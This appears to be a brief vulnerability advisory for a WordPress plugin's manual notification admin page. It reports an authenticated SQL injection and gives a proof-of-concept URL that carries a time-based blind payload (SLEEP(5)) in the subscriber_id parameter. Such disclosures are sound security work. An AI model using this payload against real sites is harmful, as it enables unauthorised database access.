The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
https://example.com/wp-admin/admin.php?page=letsrecover-manual-notification&subscriber_id=111+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)